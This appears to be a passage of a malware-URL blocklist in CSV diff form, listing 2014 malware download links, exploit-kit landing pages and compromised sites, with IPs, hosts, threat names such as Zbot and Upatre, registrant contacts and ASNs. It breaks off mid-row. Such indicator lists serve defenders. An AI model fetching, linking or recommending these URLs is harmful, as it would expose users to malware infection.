+"2014/02/14_23:35","-","94.23.62.190/upeksvr.exe","ns206681.ovh.net.","Trojan.Kelihos","-","16276","0","FR", +"2014/02/14_23:35","edf.fr.kfskz.com/facture_edf.pdf.03.exe","195.93.153.1","web-c-1.neolabs.kz.","Backdoor.Bot.MSIL","Registrar Abuse Contact abuse@enom.com","44256","0","KZ", +"2014/02/17_10:32","bracewellfamily.com/PayInfo.zip?JQrk Trojan.Zbot","96.127.180.194","s9-chicago.accountservergroup.com.","-","-","32475","0","US", +"2014/02/17_10:32","www.smartgvcfunding.com/Invoice.zip?21VJRpXbAFI7wa Trojan.Zbot","209.235.144.9","hostedc31.carrierzone.com.","-","Internet Services BT Business / domains@btdomainsaccount.com","30447","0","US", +"2014/02/17_10:32","www.fabioalbini.com/Order.zip?YIjoBgGhCBbs Trojan.Zbot","195.110.150.4","net150-004.mclink.it.","-","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/02/18_15:40","funchill.com/Invoice.zip","192.254.236.149","-","Trojan.Zbot","-","46606","0","US", +"2014/02/18_15:40","nc2199.eden5.netclusive.de/Invoice.zip","89.110.129.55","eden5.netclusive.de.","Trojan.Zbot","hostmaster@netclusive.de","24989","0","DE", +"2014/02/18_15:40","notebookservisru.161.com1.ru/PayInfo.zip","89.108.67.65","cp161.agava.net.","Trojan.Zbot","-","43146","0","RU", +"2014/02/18_15:40","www.fabioalbini.com/Invoice.zip","195.110.150.4","net150-004.mclink.it.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","5396","0","IT", +"2014/02/18_15:40","www.notaverde.com/Invoice.zip","205.236.147.30","www2.securenet.net.","Trojan.Zbot","-","14112","0","CA", +"2014/02/19_01:05","directxex.com/uploads/841642867.johny.exe","108.162.198.96","-","TR/Ransom.243715","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","directxex.com/uploads/1769382244.HDPlayer_BETA_installer_v2.55.exe","108.162.198.96","-","MSIL/Injector.CSR trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", 
+"2014/02/19_01:05","directxex.com/uploads/606454025.Download.exe","108.162.198.96","-","MSIL/Bladabindi.O trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","directxex.com/uploads/214894250.pics.rar","108.162.198.96","-","RAR/Agent.X trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","directxex.com/uploads/1483904659.photooamirat-annaba.exe","108.162.199.96","-","Win32/Injector.UJN trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","directxex.com/uploads/1844534592.avg.exe","108.162.199.96","-","Win32/Injector.AXIM trojan","Registrar Abuse Contact abuse@enom.com","13335","0","US", +"2014/02/19_01:05","download-archiver.ru","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","downloads-finereader.ru","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","myvksaver.ru","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","winrar-soft.ru","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","download-archiver.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","downloads-finereader.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","myvksaver.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_01:05","winrar-soft.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", 
+"2014/02/19_01:05","download-archiver.ru/download.php?file=winrar","103.31.186.207","103.31.186.207.reserved.voxility.com.","Win32/Injector.AYAH","-","39743","0","HK", +"2014/02/19_08:08","resolvethem.com","141.101.116.122","-","DOS service","Registrar Abuse Contact abuse@enom.com","13335","0","EU", +"2014/02/19_08:08","vitalityxray.com","5.135.127.68","-","Exploit","-","16276","0","FR", +"2014/02/19_08:08","fallencrafts.info","37.59.68.26","-","Multiple.Malware","WhoisGuard Protected / a2947cc98e68415b983f81ded9e98f3e.protect@whoisguard.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/3.exe","37.59.68.26","-","Win32/Injector.AXJG","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/xwmltc.exe","37.59.68.26","-","Win32/Injector.AXDN","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/pts.exe","37.59.68.26","-","Win32/BitCoinMiner.AU","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/ca.exe","37.59.68.26","-","Win32/TrojanDownloader.Wauchos.X","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/beef.tgz","37.59.68.26","-","multiple threats","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/x86.exe","37.59.68.26","-","Win32/BitCoinMiner.AU","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_08:08","e1r.net/download/wmltc.exe","37.59.68.26","-","Win32/CoinMiner.JG","Registrar Abuse Contact abuse@enom.com","16276","0","FR", +"2014/02/19_11:23","ru.theswiftones.com/","178.33.152.221","-","exploit kit / requires Google referrer","-","16276","0","FR", +"2014/03/03_11:05","mgfd1b.petrix.net/5i9fh30/?2","64.202.123.2","server.fenixmediahosting.info.","exploit kit","Registrar Abuse Contact abuse@melbourneit.com.au","23352","0","US", 
+"2014/03/03_11:05","mgfd1b.petrix.net/5i9fh30/counter.php?fid=2","64.202.123.2","server.fenixmediahosting.info.","redirects to exploit kit","Registrar Abuse Contact abuse@melbourneit.com.au","23352","0","US", +"2014/02/21_05:43","mirandolasrl.it/inddex.html","194.209.228.109","orion.servicedomus.org.","Leads to Trojan.Zbot","-","3303","0","CH", +"2014/02/21_05:43","mirandolasrl.it/index.zip","194.209.228.109","orion.servicedomus.org.","Trojan.Zbot","-","3303","0","CH", +"2014/02/21_05:43","dianepiette.co.uk/inddex.html","87.117.220.252","server3.velnetweb.co.uk.","Leads to Trojan.Zbot","Diane Piette / -","20860","0","GB", +"2014/02/21_05:43","dianepiette.co.uk/index.zip","87.117.220.252","server3.velnetweb.co.uk.","Trojan.Zbot","Diane Piette / -","20860","0","GB", +"2014/02/21_05:43","www.seal-technicsag.ch/inddex.html","82.195.224.113","gic-web-bsd-013.genotec.ch.","Leads to Trojan.Zbot","-","1836","0","CH", +"2014/02/21_05:43","h1666015.stratoserver.net/inddex.html","85.214.157.217","h1666015.stratoserver.net.","Leads to Trojan.Zbot","Registrar Abuse Contact abuse@strato.de","6724","0","DE", +"2014/02/21_05:43","h1666015.stratoserver.net/inddex.html","85.214.157.217","h1666015.stratoserver.net.","Leads to Trojan.Zbot","Registrar Abuse Contact abuse@strato.de","6724","0","DE", +"2014/02/21_05:43","www.seal-technicsag.ch/inddex.html","82.195.224.113","gic-web-bsd-013.genotec.ch.","Leads to Trojan.Zbot","-","1836","0","CH", +"2014/02/21_05:43","plantaardigebrandstof.nl/inddex.html","5.200.7.36","server.ccchost6.nl.","Leads to Trojan.Zbot","-","49544","0","NL", +"2014/02/21_05:43","www.seal-technicsag.ch/index.zip","82.195.224.113","gic-web-bsd-013.genotec.ch.","Trojan.Zbot","-","1836","0","CH", +"2014/02/21_05:43","h1666015.stratoserver.net/index.zip","85.214.157.217","h1666015.stratoserver.net.","Trojan.Zbot","Registrar Abuse Contact abuse@strato.de","6724","0","DE", 
+"2014/02/21_05:43","h1666015.stratoserver.net/index.zip","85.214.157.217","h1666015.stratoserver.net.","Trojan.Zbot","Registrar Abuse Contact abuse@strato.de","6724","0","DE", +"2014/02/21_05:43","www.seal-technicsag.ch/index.zip","82.195.224.113","gic-web-bsd-013.genotec.ch.","Trojan.Zbot","-","1836","0","CH", +"2014/02/21_05:43","plantaardigebrandstof.nl/index.zip","5.200.7.36","server.ccchost6.nl.","Trojan.Zbot","-","49544","0","NL", +"2014/02/21_06:01","ama-alliance.com/inddex.html","198.23.48.162","hosted.by.liquidnetlimited.com.","Leads to Trojan.Zbot","Alison Hardin (choongsil@hughes.net)","32748","0","US", +"2014/02/21_06:01","faiyazahmed.com/inddex.html","74.220.207.177","host177.hostmonster.com.","Leads to Trojan.Zbot","Registrar Abuse Contact support@hostmonster.com","46606","0","US", +"2014/02/21_06:01","boschetto-hotel.gr/inddex.html","69.61.106.201","cerberus.impel.gr.","Leads to Trojan.Zbot","-","22653","0","US", +"2014/02/21_06:01","ama-alliance.com/index.zip","198.23.48.162","hosted.by.liquidnetlimited.com.","Trojan.Zbot","Alison Hardin (choongsil@hughes.net)","32748","0","US", +"2014/02/21_06:01","faiyazahmed.com/index.zip","74.220.207.177","host177.hostmonster.com.","Trojan.Zbot","Registrar Abuse Contact support@hostmonster.com","46606","0","US", +"2014/02/21_06:01","boschetto-hotel.gr/index.zip","69.61.106.201","cerberus.impel.gr.","Trojan.Zbot","-","22653","0","US", +"2014/02/21_07:00","nlconsulateorlandoorg.siteprotect.net/index.zip","64.71.35.58","-","Trojan.Zbot","Registrar Abuse Contact abuse@domainpeople.com","20401","0","US", +"2014/02/21_07:00","images.topguncustomz.com/index.zip","67.59.130.154","texashomeowner.org.","Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","20021","0","US", +"2014/02/21_07:00","nlconsulateorlandoorg.siteprotect.net/inddex.html","64.71.35.58","-","Leads to Trojan.Zbot","Registrar Abuse Contact abuse@domainpeople.com","20401","0","US", 
+"2014/02/21_07:00","images.topguncustomz.com/inddex.html","67.59.130.154","texashomeowner.org.","Leads to Trojan.Zbot","Registrar Abuse Contact domainabuse@tucows.com","20021","0","US", +"2014/02/21_08:54","www.acquisizionevideo.com/download-software-free.html/uploads/4/9/4/6/4946671/mp3mymp3install.exe","185.53.177.8","-","Trojan","Registrar Abuse Contact abuse@web.com","61969","0","DE", +"2014/02/25_12:51","-","142.0.79.184/agent/agent.php?cr=ila","-","leads to fake flashplayer","-","54444","0","US", +"2015/05/11_09:30","sgs.us.com/sU3P6pqaWwkJ/","23.253.130.80","server1.www.mc-solutions.com.","trojan","Registrar Abuse Contact abuse@tldregistrarsolutions.com","27357","0","US", +"2014/02/28_10:40","anshrit.com/images/m216.exe","103.8.127.189","server02.hostingraja.in.","Trojan.Injector","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18229","0","IN", +"2014/02/28_10:40","4dexports.com/images/wav1.exe","103.8.127.189","server02.hostingraja.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18229","0","IN", +"2014/02/28_10:40","bracbetul.com/images/sh-pdf.exe","103.8.127.189","server02.hostingraja.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18229","0","IN", +"2014/02/28_10:40","merrymilkfoods.com/wp-content/uploads/2014/01/wav.exe","103.8.127.205","server08.hostingraja.in.","Trojan.Zbot","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","18229","0","IN", +"2014/04/27_12:36","-","94.242.225.240/download/3a/W05YVFESKDU2M35qaSEnOykuP2MoLiMlfz49J3glLXY9PigCNCwPD10QEAdbVk4NAw9RWlldR0lCRUFHUBERFR8kFRlDDR27YA/voskresenie_-_kto_vinovat_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", 
+"2014/04/27_12:36","-","94.242.225.240/download/3a/W05YVFESKDU2M35qaSEnOykuP2MoLiMlfz49J3glLXY9PigCNCwPD10QEAdbVk4NAw9RWlldR0lCS0dFUBERFR8kFRlDDR27YA/voskresenie_-_kto_vinovat_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/04/27_12:36","-","94.242.225.240/download/e5/hJODgYbHg5iZntXf3pSchpaThNafm4iI0JOWci9wditiY3NXY3lkYjJ9e3IsIzVwfHIqLy4oLCQpLCsUB0RKSEB5TkwUDR2/YA/voskresenie_-_po_doroge_razocharovaniy_zaycev_net.exe?pack","ip-static-94-242-225-240.as5577.net.","Win32/Kryptik.BZSH.Gen","-","5577","0","LU", +"2014/04/27_12:36","powershopnet.net","82.194.66.169","vlc-143.dns-servicios.com.","Exploit","Julio Rosal / rosal@grupopowershop.com","16371","0","ES", +"2014/04/27_12:36","best100catfights.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","blackfalcon5.net","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","dancecourt.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","femalewrestlingnow.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","fetishfitnessbabes.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","fetishlocator.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","hotfacesitting.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","jeansvixens.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","oilwrestlingeurope.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/27_12:36","sexyoilwrestling.com","216.87.173.52","flamingowrestling.com.","Exploit","-","30217","0","US", +"2014/04/29_08:25","www.marss.eu/","95.110.133.212","host212-133-110-95.serverdedicati.aruba.it.","obfuscated Javascript 
leads to fake flash player site","NOT DISCLOSED! / technical@staff.aruba.it","31034","0","IT", +"2014/05/01_00:23","ocpersian.com","74.208.21.148","-","Android.Trojan.SMSStealer","Registrar Abuse Contact abuse@1and1.com","8560","0","US", +"2014/10/09_13:05","www.sasenergia.pt/images/highslide/highslide-with-gallery.js","176.221.32.120","pplc32120.ciberserver.com.","Compromised site leading to exploit","FILIPE CANEDO DA MOTA E SÁ / fsa@irmaossas.com","8426","0","PT", +"2014/09/16_09:59","optilogus.com/twmfizdfmu/lteqwxftti.html","192.185.17.123","-","Compromised site (Sage malspam campaign), leads to Upatre","Registrar Abuse Contact abuse@name.com","20013","0","US", +"2014/09/16_09:59","flashsavant.com/cqavunntfg/kuldytebws.html","74.91.152.2","2.webhosting.ecommerce.com.","Compromised site (Sage malspam campaign), leads to Upatre","-","32392","0","US", +"2014/09/16_09:59","becomedebtfree.com.au/ttlnlmwbox/ctinpfgeob.html","198.57.194.65","198-57-194-65.unifiedlayer.com.","Compromised site (Sage malspam campaign), leads to Upatre","Jarrod Sierocki / Visit whois.ausregistry.com.au for Web based WhoIs","46606","0","US", +"2014/09/16_09:59","unitex.home.pl/bbhdskxelc/wlqcwttani.html","79.96.42.136","v061604.home.net.pl.","Compromised site (Natwest malspam campaign), leads to Upatre","-","12824","0","PL", +"2014/09/16_09:59","becomedebtfree.com.au/zscczqbncu/nrrwalnlba.html","198.57.194.65","198-57-194-65.unifiedlayer.com.","Compromised site (Sage malspam campaign), leads to Upatre","Jarrod Sierocki / Visit whois.ausregistry.com.au for Web based WhoIs","46606","0","US", +"2014/09/16_09:59","hobbytotaalservice.nl/dspbhbslyt/twzokdiymd.html","85.17.155.23","hosted-by.leaseweb.com.","Compromised site (Natwest malspam campaign), leads to Upatre","-","16265","0","NL", +"2014/09/16_09:59","bnsoutlaws.co.uk/xzvltaqahm/hrbturjzuh.html","87.249.106.3","rev-3.106.249.87.virtu.nl.","Compromised site (Natwest malspam campaign), leads to Upatre","Andy Wallace / -","16243","0","NL", 
+"2014/09/16_09:59","bnsoutlaws.co.uk/vhwqpjheft/nlxclwfmym.html","87.249.106.3","rev-3.106.249.87.virtu.nl.","Compromised site (Natwest malspam campaign), leads to Upatre","Andy Wallace / -","16243","0","NL", +"2014/09/16_09:59","bnsoutlaws.co.uk/sadpwzhoww/durnmjxqyj.html","87.249.106.3","rev-3.106.249.87.virtu.nl.","Compromised site (Natwest malspam campaign), leads to Upatre","Andy Wallace / -","16243","0","NL", +"2014/09/16_09:59","artsconsortium.org/znquvoclmr/bamgrmqmgb.html","72.47.194.241","gumey.com.","Compromised site (Natwest malspam campaign), leads to Upatre","Michael Barcellos / michael@barcellosdesign.com","31815","0","US", +"2014/09/16_09:59","artsconsortium.org/wkqcisrgap/ahqjkywlsx.html","72.47.194.241","gumey.com.","Compromised site (Natwest malspam campaign), leads to Upatre","Michael Barcellos / michael@barcellosdesign.com","31815","0","US", +"2014/09/16_09:59","artsconsortium.org/lcrplilcal/irzdmndcby.html","72.47.194.241","gumey.com.","Compromised site (Natwest malspam campaign), leads to Upatre","Michael Barcellos / michael@barcellosdesign.com","31815","0","US", +"2014/09/16_09:59","-","162.210.70.17/uemfjtpigt/dgnkhubxnc.html","162.210.70-17.confluence-networks.com.","Compromised site (Natwest malspam campaign), leads to Upatre","-","40034","0","VG", +"2014/09/16_09:59","ambulanciaslazaro.com/nqwkgtzemx/yjfqpocron.html","149.62.168.210","inetworking.vservers.es.","Compromised site (Natwest malspam campaign), leads to Upatre","Registrar Abuse Contact domainabuse@tucows.com","12860","0","ES", +"2014/09/16_09:59","luchtenbergdecor.com.br/cythsfonuj/sijnkzotme.js","186.202.56.110","CPROHWIN0190.locaweb.com.br.","Compromised site (Natwest malspam campaign), leads to Upatre","VALDENIR TORRES E SILVA / valdenirtorres@ig.com.br","27715","0","BR", +"2014/09/16_09:59","ciclismovalenciano.com/wcxpcflvbj/ymkmcvpnkh.js","46.29.49.1","cloud1.hospedajeydominios.com.","Compromised site (Natwest malspam campaign), leads to Upatre","Registrar Abuse Contact 
abuse@enom.com","51718","0","ES", +"2014/09/16_09:59","pix360.co.nf/lgdjojxwuo/fofrkxuhgc.html","83.125.22.199","-","Compromised site (DHL malspam campaign), leads to Upatre","-","13237","0","EU", +"2014/09/16_09:59","isonomia.com.ar/mkyejphtxc/nsjkdqsmto.html","200.58.123.153","x094vm14.isonomia.com.ar.","Compromised site (DHL malspam campaign), leads to Upatre","-","27823","0","AR", +"2014/09/16_09:59","interactivearea.ru/kuxqihgvye/dbjyaszqcq.html","37.140.192.82","server51.hosting.reg.ru.","Compromised site (DHL malspam campaign), leads to Upatre","-","197695","0","RU", +"2014/09/16_09:59","okeanbg.com/lwpxofmvqz/jeslvdvjrt.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", +"2014/09/16_09:59","okeanbg.com/jfydaalego/mimaefuenh.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", +"2014/09/16_09:59","interactivearea.ru/tjnmfqjver/tswcsbafys.html","37.140.192.82","server51.hosting.reg.ru.","Compromised site (DHL malspam campaign), leads to Upatre","-","197695","0","RU", +"2014/09/16_09:59","www.advancesrl.eu/ryubfrytqb/dkdorvskxe.html","62.149.142.94","webx328.aruba.it.","Compromised site (DHL malspam campaign), leads to Upatre","NOT DISCLOSED! 
/ technical@staff.aruba.it","31034","0","IT", +"2014/09/16_09:59","dimensionnail.ro/jfcwzdbvzq/ovgjelahsu.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","okeanbg.com/vcvzwsaybm/agptgouxot.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", +"2014/09/16_09:59","www.advancesrl.eu/tjjyeqyfjz/gmiuxfhgsb.html","62.149.142.94","webx328.aruba.it.","Compromised site (DHL malspam campaign), leads to Upatre","NOT DISCLOSED! / technical@staff.aruba.it","31034","0","IT", +"2014/09/16_09:59","www.advancesrl.eu/ukhclcatkr/brcybmsute.html","62.149.142.94","webx328.aruba.it.","Compromised site (DHL malspam campaign), leads to Upatre","NOT DISCLOSED! / technical@staff.aruba.it","31034","0","IT", +"2014/09/16_09:59","dimensionnail.ro/qydmsiazxq/fdoyqfddox.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","dimensionnail.ro/ijaiqwgdcr/nxcubmnbyu.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","interactivearea.ru/rcaxfhtfnu/wghvxslkiv.html","37.140.192.82","server51.hosting.reg.ru.","Compromised site (DHL malspam campaign), leads to Upatre","-","197695","0","RU", +"2014/09/16_09:59","dimensionnail.ro/zgzjgmytap/jnreistghg.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","okeanbg.com/rjanequlla/nyxliupxyf.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", 
+"2014/09/16_09:59","cosmetice-farduri.ro/puhmivlnki/gvddofpfpv.html","144.76.194.178","ns.icetechcopycenter.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","pix360.co.nf/wisnyrdqou/ltbwattpww.html","83.125.22.199","-","Compromised site (DHL malspam campaign), leads to Upatre","-","13237","0","EU", +"2014/09/16_09:59","interactivearea.ru/qbwfmjfuui/fbtvmwobxx.html","37.140.192.82","server51.hosting.reg.ru.","Compromised site (DHL malspam campaign), leads to Upatre","-","197695","0","RU", +"2014/09/16_09:59","isonomia.com.ar/vwyryztlkn/nsxiquronl.html","200.58.123.153","x094vm14.isonomia.com.ar.","Compromised site (DHL malspam campaign), leads to Upatre","-","27823","0","AR", +"2014/09/16_09:59","cosmetice-farduri.ro/modidoogrt/gjdotmqgzx.html","144.76.194.178","ns.icetechcopycenter.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","okeanbg.com/sshbuycplb/hbkfnidlfx.html","91.215.216.21","hook.icnhost.net.","Compromised site (DHL malspam campaign), leads to Upatre","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","49699","0","BG", +"2014/09/16_09:59","dimensionnail.ro/aqbfyipgkh/hjyxeiamcp.html","85.10.205.164","ns.gorilahosting.ro.","Compromised site (DHL malspam campaign), leads to Upatre","-","24940","0","DE", +"2014/09/16_09:59","luchtenbergdecor.com.br/gcbelfuqbk/ygjbemlcsd.js","186.202.56.110","CPROHWIN0190.locaweb.com.br.","Compromised site (DHL malspam campaign), leads to Upatre","VALDENIR TORRES E SILVA / valdenirtorres@ig.com.br","27715","0","BR", +"2014/09/10_10:42","pepelacer.computingservices123.com/7b828d9fbn1vw/1/9ffbf35e4190fbba62f70c8477fa3964.html","176.58.111.253","li489-253.members.linode.com.","exploit kit","Registrar Abuse Contact abuse@web.com","15830","0","GB", +"2014/09/02_09:11","alsoknowsit.com/wp-files/config.bin","80.250.114.239","kvm.arconet.ee.","Zeus config file","-","39038","0","EE", 
+"2014/08/03_18:10","-","46.183.221.58/we/bot.exe","ip-221-58.dataclub.biz.","Trojan.Zbot","-","52048","0","LV", +"2014/08/03_18:10","-","46.183.221.58/snow/bot.exe","ip-221-58.dataclub.biz.","Trojan.Zbot","-","52048","0","LV", +"2014/07/30_23:56","coalimpex.com/web/boleto2.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/boleto.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/bg-02.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/receita-cliente1.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/receita-cliente.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/advocacia.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/bo_03.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/advocacia.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/bo_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar 
Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/bo_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/hven_04.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/ch_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/hven_03.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/hven_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/hot-venda/hven_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/pe_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/re_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/pe_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/ad_04.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/ad_02.php","192.3.1.250","-","Leads to 
Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/ad_03.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/pe/ad_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/serasa/serasa_02.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","coalimpex.com/web/serasa/serasa_01.php","192.3.1.250","-","Leads to Trojan.Banload","Registrar Abuse Contact abuse-contact@publicdomainregistry.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/boleto2.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/boleto.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/bg-02.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/receita-cliente1.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/receita-cliente.jpg","192.3.1.250","-","Used by malspam to lead victims to Trojan.Banload","MINISTERIO-PUBLI.INFO@domainsbyproxy.com","36352","0","US", +"2014/07/30_23:56","ministerio-publi.info/web/hot-venda/advocacia.jpg","192.3.1.250","-","Used by malspam to lead victims to 
